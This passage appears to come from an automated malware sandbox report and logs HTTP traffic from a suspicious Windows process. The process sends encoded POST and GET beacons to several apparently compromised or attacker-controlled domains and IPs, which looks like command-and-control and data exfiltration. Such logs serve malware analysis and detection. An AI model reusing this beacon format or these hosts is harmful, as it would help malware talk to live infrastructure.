                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.hellokong.xyz
                                                    Origin: http://www.hellokong.xyz
                                                    Referer: http://www.hellokong.xyz/oui5/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Data Ascii: 7Dihs8p=fDzsK/XJya2uQ8JMgGgmlQ93ANnz9uuXmyK514FaoqkQlxEAM851uegM7bM4/SK3eUJBEO9G+bhA5MOS4x5VfHUCFSinKZSWT6B6LDjkLzWu7xwIPOzRqSN8irZesoPPUxBfm165GCejU2EUeJTo8h/6PqnD0QdEeynG81tzfLGQvi6ioIjAJaio1xiBVpK0xc2AeCdG4mYnSkAnl4/EuYhCkgdDctK7K0l/t08QIVvHF5nFnjm75bRIC13vt/hreDHeNi3za/WNMgzATeNE2hOyhvOaoZx1GdshvwZacNwlDwAdtGLBOQytWsi/Zf9AboSAW1QMOdtSrEK9sxt5ASVvjDcmP5rzz5NFGPhS68EykFgp0r9FcunPriiWK3edsumnM+gPbyYUN9Eevr89zbLWg2DUAkwD933LDx/q4rd/GCdqRwYF5JHEwFe1sSDXf5HsfipXWkJSeg8Eu06wJ49XDn/8fLq1K8VtqJf/L95WbkSwQzqXJHlmkf97Ei7+qDwKJtN2StA/UZcYEbyp92gWtacppU7bJZcxd+LHhI48wUmtybtGk0lXefICnaZxpPANDNy7QQTIFjPwjBgvsQy2FAAuPzEguIaS2pY0dI0eh4uU+3gMfcaITP1c8hAcrlscDkIuddLPV4u0d+/NPtMBidIoNWikx9dSGljCpKwtYIN9Gf50BDo+8OmvLBNNToOM+jCEez9AAc+6zCZ0U5GutXpqVjku7fA/lPliNoc0dWf5trz3nIWbi/xEQ0p5KU5eEvCs7noncoB/D/i8z1rKwGjHj8nLaJJDAnmHxjvDiutxCVFoNd9kRsqs42b5KQjl8rw0+PNPVlXXwz6EaHmgIhAeE0j8igLemBHFogIRcmzyyYrQwJAeWCD29Xc82kYX2qVLkboXklZsuQrcI0hikQ1JsKLfFuKyJgrzFqr4OilEk6mgx6B7PjMuIDt4K/228Kqaopmmdre3nPk2lnCzfpsLXZ43hCBbZzPI/aU6 [TRUNCATED]
                                                    Jul 3, 2024 17:52:20.507966042 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                    Date: Wed, 03 Jul 2024 15:52:20 GMT
                                                    Server: Apache
                                                    Content-Length: 389
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    20 | 192.168.2.6 | 49749 | 203.161.49.220 | 80 | 5776 | C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 17:52:22.430128098 CEST | 345 | OUT | GET /oui5/?7Dihs8p=SBbMJInblZiNUqJtj2t3oAZeaf7w1Mr63FaPzYR5npk3jTg+edZF9NME4tF9tViJCHx7c4tSq6N/qcOwzg98IChDG2ekcZOWcYJRK2znKimA3GQ/fbvAwxxdlKlVh8HBUwdv3Sg=&Bp=2LpD8tLh HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US,en;q=0.9
                                                    Connection: close
                                                    Host: www.hellokong.xyz
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Jul 3, 2024 17:52:23.013477087 CEST | 548 | IN | HTTP/1.1 404 Not Found
                                                    Date: Wed, 03 Jul 2024 15:52:22 GMT
                                                    Server: Apache
                                                    Content-Length: 389
                                                    Connection: close
                                                    Content-Type: text/html; charset=utf-8
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    21 | 192.168.2.6 | 49750 | 217.160.0.84 | 80 | 5776 | C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 17:52:28.345102072 CEST | 631 | OUT | POST /s24g/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 212
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.architect-usschool.com
                                                    Origin: http://www.architect-usschool.com
                                                    Referer: http://www.architect-usschool.com/s24g/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Data Ascii: 7Dihs8p=1pgFM2Bg2oSjLj4RFb0r2MnyHQidXi2ZjvVDynNPe+RPYxDZ64b5YB6QswRxprDWy8lPOWz+VbRZ20Ab8JR+RyENI3ghl7WV/AeJjPYs2z8sSiD5m7YNDdTm49EUQAxJEKFPSin4Zj33TV/zNhgWZeGr7LvvcMf+VF4WfzM5eUNqYOc2kCiRq/gC/QtnM3Q63Z6hqbNSKO9P
                                                    Jul 3, 2024 17:52:29.391721010 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Date: Wed, 03 Jul 2024 15:52:28 GMT
                                                    Server: Apache
                                                    X-Powered-By: PHP/8.2.20
                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                    Link: <http://architect-usschool.com/wp-json/>; rel="https://api.w.org/"
                                                    Content-Encoding: gzip


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    22 | 192.168.2.6 | 49751 | 217.160.0.84 | 80 | 5776 | C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 17:52:30.884514093 CEST | 655 | OUT | POST /s24g/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 236
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.architect-usschool.com
                                                    Origin: http://www.architect-usschool.com
                                                    Referer: http://www.architect-usschool.com/s24g/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Data Ascii: 7Dihs8p=1pgFM2Bg2oSjKDIRH60r3sn9IwidBS2djvZDylgUeMFPZTLZ55b5Vh6QkQR02bCUy8ptOTL+VfxZ2wEb8eF/QiEPCngj6rWV/AeJjPMK2zEsSRb5mfEOAdTpvNEUUAwCEKFpSmuTZmz3TUPzcQgVDOHikbuuMej0X1toeAkJKGd9UYds4xiy4vAA/S1VMXQQ1ZCh4MB1F6Ys4thUAvtYuxmAi549qkHj4w==
                                                    Jul 3, 2024 17:52:32.832146883 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Date: Wed, 03 Jul 2024 15:52:31 GMT
                                                    Server: Apache
                                                    X-Powered-By: PHP/8.2.20
                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                    Link: <http://architect-usschool.com/wp-json/>; rel="https://api.w.org/"
                                                    Content-Encoding: gzip
                                                    Jul 3, 2024 17:52:32.837706089 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Date: Wed, 03 Jul 2024 15:52:31 GMT
                                                    Server: Apache
                                                    X-Powered-By: PHP/8.2.20
                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                    Link: <http://architect-usschool.com/wp-json/>; rel="https://api.w.org/"
                                                    Content-Encoding: gzip


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    23 | 192.168.2.6 | 49752 | 217.160.0.84 | 80 | 5776 | C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 17:52:33.411583900 CEST | 1668 | OUT | POST /s24g/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 1248
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.architect-usschool.com
                                                    Origin: http://www.architect-usschool.com
                                                    Referer: http://www.architect-usschool.com/s24g/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Jul 3, 2024 17:52:34.506721020 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Date: Wed, 03 Jul 2024 15:52:33 GMT
                                                    Server: Apache
                                                    X-Powered-By: PHP/8.2.20
                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                    Link: <http://architect-usschool.com/wp-json/>; rel="https://api.w.org/"
                                                    Content-Encoding: gzip


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    24 | 192.168.2.6 | 49753 | 217.160.0.84 | 80 | 5776 | C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 17:52:35.943990946 CEST | 354 | OUT | GET /s24g/?Bp=2LpD8tLh&7Dihs8p=4rIlPCx72NWCI0QJXJwD+tzjHhGgLlyDkrck6XhMS8VcXSbKvpDPBj6V0V8nuLzRy/FwKWDUEv1cw0ImnsIqFnkVImpc8YyZ7gWSicgk/ENTSAvixeUyT+Tq9osdZT4ae7dFHSM= HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US,en;q=0.9
                                                    Connection: close
                                                    Host: www.architect-usschool.com
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Jul 3, 2024 17:52:36.843728065 CEST | 504 | IN | HTTP/1.1 301 Moved Permanently
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Date: Wed, 03 Jul 2024 15:52:36 GMT
                                                    Server: Apache
                                                    X-Powered-By: PHP/8.2.20
                                                    Expires: Wed, 03 Jul 2024 16:52:36 GMT
                                                    Cache-Control: max-age=3600
                                                    X-Redirect-By: WordPress
                                                    Location: http://architect-usschool.com/s24g/?Bp=2LpD8tLh&7Dihs8p=4rIlPCx72NWCI0QJXJwD+tzjHhGgLlyDkrck6XhMS8VcXSbKvpDPBj6V0V8nuLzRy/FwKWDUEv1cw0ImnsIqFnkVImpc8YyZ7gWSicgk/ENTSAvixeUyT+Tq9osdZT4ae7dFHSM=
                                                    Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    25 | 192.168.2.6 | 49754 | 91.195.240.19 | 80 | 5776 | C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 17:52:41.944279909 CEST | 613 | OUT | POST /3jr0/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 212
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.easybackpage.net
                                                    Origin: http://www.easybackpage.net
                                                    Referer: http://www.easybackpage.net/3jr0/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Jul 3, 2024 17:52:42.604969025 CEST | 305 | IN | HTTP/1.1 405 Not Allowed
                                                    date: Wed, 03 Jul 2024 15:52:42 GMT
                                                    content-type: text/html
                                                    content-length: 154
                                                    server: Parking/1.0
                                                    connection: close
                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    26 | 192.168.2.6 | 49755 | 91.195.240.19 | 80 | 5776 | C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 17:52:44.486196995 CEST | 637 | OUT | POST /3jr0/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 236
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.easybackpage.net
                                                    Origin: http://www.easybackpage.net
                                                    Referer: http://www.easybackpage.net/3jr0/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Jul 3, 2024 17:52:45.142249107 CEST | 305 | IN | HTTP/1.1 405 Not Allowed
                                                    date: Wed, 03 Jul 2024 15:52:45 GMT
                                                    content-type: text/html
                                                    content-length: 154
                                                    server: Parking/1.0
                                                    connection: close
                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    27 | 192.168.2.6 | 49756 | 91.195.240.19 | 80 | 5776 | C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 17:52:47.026179075 CEST | 1650 | OUT | POST /3jr0/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 1248
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.easybackpage.net
                                                    Origin: http://www.easybackpage.net
                                                    Referer: http://www.easybackpage.net/3jr0/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Jul 3, 2024 17:52:47.689011097 CEST | 305 | IN | HTTP/1.1 405 Not Allowed
                                                    date: Wed, 03 Jul 2024 15:52:47 GMT
                                                    content-type: text/html
                                                    content-length: 154
                                                    server: Parking/1.0
                                                    connection: close
                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    28 | 192.168.2.6 | 49757 | 91.195.240.19 | 80 | 5776 | C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 17:52:49.553467989 CEST | 348 | OUT | GET /3jr0/?7Dihs8p=C6nbN3Z6SrmD48dKFL5Pdr+cZFmYp1QsQ3e628IyGZcRZCB2vhKb6ox4g6I37OYbmAVSFMbRXnVDWcusSAPk0vfQfIagm0ASlZK02lSA38wn9PDfH1oUKWJrxTMbBcOAU+1qziI=&Bp=2LpD8tLh HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US,en;q=0.9
                                                    Connection: close
                                                    Host: www.easybackpage.net
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Jul 3, 2024 17:52:50.268074989 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                    date: Wed, 03 Jul 2024 15:52:50 GMT
                                                    content-type: text/html; charset=UTF-8
                                                    transfer-encoding: chunked
                                                    vary: Accept-Encoding
                                                    expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                    cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                    pragma: no-cache
                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_TfbkH5F0pX9/Qgpph10M+0koL7lXfcbrFttmxRqyWpp+WOhBwXpSMT48kXjox0ju7Apwix1mLx4FvAstGFQn0Q==
                                                    last-modified: Wed, 03 Jul 2024 15:52:50 GMT
                                                    x-cache-miss-from: parking-89c5695ff-xbfcf
                                                    server: Parking/1.0
                                                    connection: close
                                                    Jul 3, 2024 17:52:50.268388987 CEST1236INData Raw: 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 32 36 70 78 29 7d 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 65 31 36 32 65 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 56 65 72
                                                    Data Ascii: orm:translateX(26px)}body{background-color:#0e162e;font-family:Arial,Helvetica,Verdana,"Lucida Grande",sans-serif}body.cookie-message-enabled{padding-bottom:300px}.container-footer{padding-top:20px;padding-left:5%;padding-right:5%;padding-bott
                                                    Jul 3, 2024 17:52:50.268404007 CEST1236INData Raw: 65 58 28 2d 31 29 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 7a 2d 69 6e 64 65 78 3a 2d 31 3b 74 6f 70 3a 35 30 70 78 3b 70 6f 73 69 74
                                                    Data Ascii: eX(-1);-webkit-transform:scaleX(-1);transform:scaleX(-1);z-index:-1;top:50px;position:inherit}.container-content--lp{min-height:720px}.container-content--rp{min-height:820px}.container-content--rp .container-content__right,.container-content--
                                                    Jul 3, 2024 17:52:50.268414974 CEST1236INData Raw: 66 64 38 30 31 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d
                                                    Data Ascii: fd801}.two-tier-ads-list__list-element-link:link,.two-tier-ads-list__list-element-link:visited{text-decoration:underline}.two-tier-ads-list__list-element-link:hover,.two-tier-ads-list__list-element-link:active,.two-tier-ads-list__list-element-
                                                    Jul 3, 2024 17:52:50.273361921 CEST1236INData Raw: 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 63 6f 6c 6f 72 3a 23 38 38 38 7d 0a 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 76
                                                    Data Ascii: ;font-size:16px;color:#888} </style><script type="text/javascript"> var dto = {"uiOptimize":false,"singleDomainName":"easybackpage.net","domainName":"easybackpage.net","domainPrice":0,"domainCurrency":"","adultFlag":fa576lse,"


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    29 | 192.168.2.6 | 49759 | 144.208.124.10 | 80 | 5776 | C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 17:52:55.883719921 CEST | 631 | OUT | POST /mwa4/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 212
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.superunicornpalace.com
                                                    Origin: http://www.superunicornpalace.com
                                                    Referer: http://www.superunicornpalace.com/mwa4/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Jul 3, 2024 17:52:56.513710022 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                    Connection: close
                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                    cache-control: no-cache, must-revalidate, max-age=0
                                                    content-type: text/html; charset=UTF-8
                                                    link: <https://superunicornpalace.com/wp-json/>; rel="https://api.w.org/"
                                                    x-tec-api-version: v1
                                                    x-tec-api-root: https://superunicornpalace.com/wp-json/tribe/events/v1/
                                                    x-tec-api-origin: https://superunicornpalace.com
                                                    transfer-encoding: chunked
                                                    content-encoding: gzip
                                                    vary: Accept-Encoding
                                                    date: Wed, 03 Jul 2024 15:52:56 GMT
                                                    server: LiteSpeed


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    30 | 192.168.2.6 | 49760 | 144.208.124.10 | 80 | 5776 | C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 17:52:58.434169054 CEST | 655 | OUT | POST /mwa4/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 236
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.superunicornpalace.com
                                                    Origin: http://www.superunicornpalace.com
                                                    Referer: http://www.superunicornpalace.com/mwa4/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Jul 3, 2024 17:52:58.994687080 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                    Connection: close
                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                    cache-control: no-cache, must-revalidate, max-age=0
                                                    content-type: text/html; charset=UTF-8
                                                    link: <https://superunicornpalace.com/wp-json/>; rel="https://api.w.org/"
                                                    x-tec-api-version: v1
                                                    x-tec-api-root: https://superunicornpalace.com/wp-json/tribe/events/v1/
                                                    x-tec-api-origin: https://superunicornpalace.com
                                                    transfer-encoding: chunked
                                                    content-encoding: gzip
                                                    vary: Accept-Encoding
                                                    date: Wed, 03 Jul 2024 15:52:58 GMT
                                                    server: LiteSpeed


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    31 | 192.168.2.6 | 49761 | 144.208.124.10 | 80 | 5776 | C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 17:53:00.976248980 CEST | 1668 | OUT | POST /mwa4/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Cache-Control: max-age=0
                                                    Content-Length: 1248
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Host: www.superunicornpalace.com
                                                    Origin: http://www.superunicornpalace.com
                                                    Referer: http://www.superunicornpalace.com/mwa4/
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Jul 3, 2024 17:53:01.519268036 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                    Connection: close
                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                    cache-control: no-cache, must-revalidate, max-age=0
                                                    content-type: text/html; charset=UTF-8
                                                    link: <https://superunicornpalace.com/wp-json/>; rel="https://api.w.org/"
                                                    x-tec-api-version: v1
                                                    x-tec-api-root: https://superunicornpalace.com/wp-json/tribe/events/v1/
                                                    x-tec-api-origin: https://superunicornpalace.com
                                                    transfer-encoding: chunked
                                                    content-encoding: gzip
                                                    vary: Accept-Encoding
                                                    date: Wed, 03 Jul 2024 15:53:01 GMT
                                                    server: LiteSpeed
                                                    Data Ascii: =|~pGs%^F`GUG=iyh3'fh#5 6v;G'dc'YqG5krN{ue,<,,Z-gxof}o^z@c.]fx ,3SZ5\\8g7gIvoL:)EwWP/&ZJv<{
                                                    Jul 3, 2024 17:53:01.519716024 CEST1236INData Raw: 57 f1 c5 54 28 8c cf 20 cd c9 60 4c 7f 29 3b 4e 55 82 85 7a 67 1e 12 34 86 35 15 cb 75 59 c9 32 12 2b 99 51 05 23 1c a5 1e 08 25 2e a0 13 67 43 bf 23 31 c1 be 89 86 f8 9b c6 df f8 a4 84 f3 99 8d 6f f0 99 02 d0 49 34 81 08 30 6a ee 8f 8a 38 5b 82
                                                    Data Ascii: WT( `L);NUzg45uY2+Q#%.gC#1oI40j8[Dg\Sy+!XjSHl+r!j,xz/q0S5,jy^rnu:u,=[z5hjPU+qr*/L6}:XL NFZ">Kh`
                                                    Jul 3, 2024 17:53:01.519751072 CEST1236INData Raw: bc 07 c1 24 6f b9 b3 88 0c e0 a6 93 44 2b 04 3d 38 7a 14 1e 65 ae 8c a7 5b 75 fa 85 9f 8a 3b 87 a3 5e 2f 37 24 9b ad 29 05 66 96 b1 a4 98 3f 53 d1 c2 36 24 e3 48 3b ee c6 53 61 7b 33 30 5d 6b cb 0b ad 61 67 39 70 7c 68 e3 f1 6f 3f da 23 b5 84 1a
                                                    Data Ascii: $oD+=8ze[u;^/7$)f?S6$H;Sa{30]kag9p|ho?#8#j$FMN=`>ufV5[v8E<9+&7lcK0`?Tf*Zh_8_q(Lkb`.S^]0vDdGe+T}q:wD$}xz~!Z7
                                                    Jul 3, 2024 17:53:01.524386883 CEST1236INData Raw: 31 11 b9 ab 5f 1b c8 57 41 80 c9 94 e0 0c 86 af a3 13 e4 4f b1 92 41 c5 38 c9 56 b2 aa 92 d2 71 ec 18 59 66 2b a5 d2 70 e3 0d 16 81 73 bd f7 e5 18 ae f7 26 af 8b bd d3 13 7f d1 85 cb fa de 7b 75 bb 37 4b 97 e4 72 1e 8e fe 46 c2 26 a2 85 62 02 29
                                                    Data Ascii: 1_WAOA8VqYf+ps&{u7KrF&b)uD+7:2Efcn@iUNk&&U-+=m[dk13@U1}[/7:V\^])-Est#/-Lgx&cpp


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    32 | 192.168.2.6 | 49762 | 144.208.124.10 | 80 | 5776 | C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 17:53:03.505568981 CEST | 354 | OUT | GET /mwa4/?Bp=2LpD8tLh&7Dihs8p=BKtoJfTGgHJzrpd1kXP6JuCpnJS0Vaq/yhZppoO2EP353cwV9Kf7u0HM3e0YD5Mg8P8TnPOgCoBiwA2kvNm9UdnLeQplEPepVbn/svzmQdla2L+ZsYtoIxEUyzWZOW0K59hRfLs= HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US,en;q=0.9
                                                    Connection: close
                                                    Host: www.superunicornpalace.com
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                    Jul 3, 2024 17:53:04.070106983 CEST | 491 | IN | HTTP/1.1 301 Moved Permanently
                                                    Connection: close
                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
